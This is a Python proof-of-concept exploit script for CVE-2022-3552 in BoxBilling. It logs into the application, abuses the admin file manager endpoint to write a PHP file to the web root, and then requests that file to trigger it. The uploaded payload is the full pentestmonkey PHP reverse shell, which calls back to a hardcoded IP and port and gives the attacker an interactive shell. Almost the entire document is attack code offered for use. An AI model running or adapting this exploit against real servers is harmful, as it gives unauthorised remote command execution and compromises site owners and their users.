CVE-2022-3552.py

#!/usr/bin/ python

from pwn import *
from sys import exit
import requests
import argparse


def get_arguments():
    parser = argparse.ArgumentParser()
    parser.add_argument("-d", "--domain", dest="domain", help="Domain URL Address.")
    parser.add_argument("-u", "--email", dest="email", help="Login Username.")
    parser.add_argument("-p", "--password", dest="password", help="Login Password.")
    parser.add_argument("-li", "--local-ip", dest="local_ip", help="Enter your IP Address.")
    parser.add_argument("-lp", "--port", dest="port", help="Enter the port number.")
    options = parser.parse_args()
    return options


class Exploit:
    def __init__(self, url, email, password):
        self.session = None
        self.url = url
        self.email = email
        self.password = password
        # self.rce_command = rce_command

    def login(self):
        self.session = requests.Session()
        login_url = self.url + "/api/guest/staff/login"
        login_data = {
            "email": {self.email},
            "password": {self.password},
            "remember": 1,
        }
        try:
            login_session = self.session.post(login_url, data=login_data)
            if "Check your login details" in login_session.text:
                log.warn("login failed!")
                exit(0)
            if "Check your login details" not in login_session.text:
                log.success("Successfully logged in")

        except KeyboardInterrupt:
            log.success("Exiting..")

    def box_billing_rce_exploit(self):
        try:
            rce_php_payload = """
  <?php
  // php-reverse-shell - A Reverse Shell implementation in PHP
  // Copyright (C) 2007 pentestmonkey@pentestmonkey.net

  set_time_limit (0);
  $VERSION = "1.0";
  $ip = '192.168.228.128';  // You have changed this
  $port = 1337;  // And this
  $chunk_size = 1400;
  $write_a = null;
  $error_a = null;
  $shell = 'uname -a; w; id; /bin/sh -i';
  $daemon = 0;
  $debug = 0;

  //
  // Daemonise ourself if possible to avoid zombies later
  //

  // pcntl_fork is hardly ever available, but will allow us to daemonise
  // our php process and avoid zombies.  Worth a try...
  if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();
    
    if ($pid == -1) {
      printit("ERROR: Can't fork");
      exit(1);
    }
    
    if ($pid) {
      exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
      printit("Error: Can't setsid()");
      exit(1);
    }

    $daemon = 1;
  } else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  }

  // Change to a safe directory
  chdir("/");

  // Remove any umask we inherited
  umask(0);

  //
  // Do the reverse shell...
  //

  // Open reverse connection
  $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
  }

  // Spawn shell process
  $descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
  );

  $process = proc_open($shell, $descriptorspec, $pipes);

  if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
  }

  // Set everything to non-blocking
  // Reason: Occsionally reads will block, even though stream_select tells us they won't
  stream_set_blocking($pipes[0], 0);
  stream_set_blocking($pipes[1], 0);
  stream_set_blocking($pipes[2], 0);
  stream_set_blocking($sock, 0);

  printit("Successfully opened reverse shell to $ip:$port");

  while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
      printit("ERROR: Shell connection terminated");
      break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
      printit("ERROR: Shell process terminated");
      break;
    }

    // Wait until a command is end down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
      if ($debug) printit("SOCK READ");
      $input = fread($sock, $chunk_size);
      if ($debug) printit("SOCK: $input");
      fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
      if ($debug) printit("STDOUT READ");
      $input = fread($pipes[1], $chunk_size);
      if ($debug) printit("STDOUT: $input");
      fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
      if ($debug) printit("STDERR READ");
      $input = fread($pipes[2], $chunk_size);
      if ($debug) printit("STDERR: $input");
      fwrite($sock, $input);
    }
  }

  fclose($sock);
  fclose($pipes[0]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  proc_close($process);

  // Like print, but does nothing if we've daemonised ourself
  // (I can't figure out how to redirect STDOUT like a proper daemon)
  function printit ($string) {
    if (!$daemon) {
      print "$string
";
    }
  }
  ?> 
            """
            new_payload_file = "new_exploit.php"
            request_headers = {
                "Content-Type":  "application/x-www-form-urlencoded"
            }
            data = {
                "order_id": 1,
                "path": new_payload_file,
                "data": rce_php_payload
            }
            self.session.post(
                self.url + "/index.php?_url=/api/admin/Filemanager/save_file",
                headers=request_headers,
                data=data
            )
            log.success("Payload saved successfully")
            log.success("Getting Shell")
            requests.get(self.url + "/" + new_payload_file)
            exit(0)


        except KeyboardInterrupt:
            log.success("Exiting..")


if __name__ == "__main__":
    options = get_arguments()

    url_ip = options.domain
    box_billing_email = options.email
    box_billing_password = options.password
    exploit = Exploit(url_ip, box_billing_email, box_billing_password)

    exploit.login()
    exploit.box_billing_rce_exploit()